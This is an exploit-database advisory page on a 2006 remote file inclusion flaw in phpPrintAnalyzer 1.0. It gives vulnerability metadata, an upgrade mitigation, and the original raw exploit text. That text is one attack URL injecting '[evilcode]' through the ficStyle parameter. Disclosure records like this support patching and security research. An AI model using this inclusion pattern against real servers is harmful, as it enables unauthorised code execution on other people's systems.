header-logo
Suggest Exploit
vendor:
phpPrintAnalyzer
by:
Cmaster4
7,5
CVSS
HIGH
phpPrintAnalyzer Inclusion Vulnerability
94
CWE
Product Name: phpPrintAnalyzer
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: CVE-2006-4372
CPE: o:php:phpprintanalyzer:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

phpPrintAnalyzer Inclusion Vulnerability

phpPrintAnalyzer is vulnerable to remote file inclusion attacks. An attacker can include arbitrary files from remote locations by using a URL in the ficStyle parameter.

Mitigation:

Upgrade to the latest version of phpPrintAnalyzer.
Source

Exploit-DB raw data:

#title: phpPrintAnalyzer Inclusion Vulnerability
 
#Author: Cmaster4 #batamhacker irc.dal.net
 
#script: phpPrintAnalyzer
 
#Class : Remote
 
#cont@ct: gaul@enet.com.cn
 
#Exploit:
http://server/[path]/inc/header.inc.php?ficStyle=[evilcode]

Thx to :
#batamhacker crew on dal.net h4ntu, havincaz, baylaw and all indonesian underground hacker

# milw0rm.com [2006-08-10]

Navigation

Suggest Exploit

Services By CQR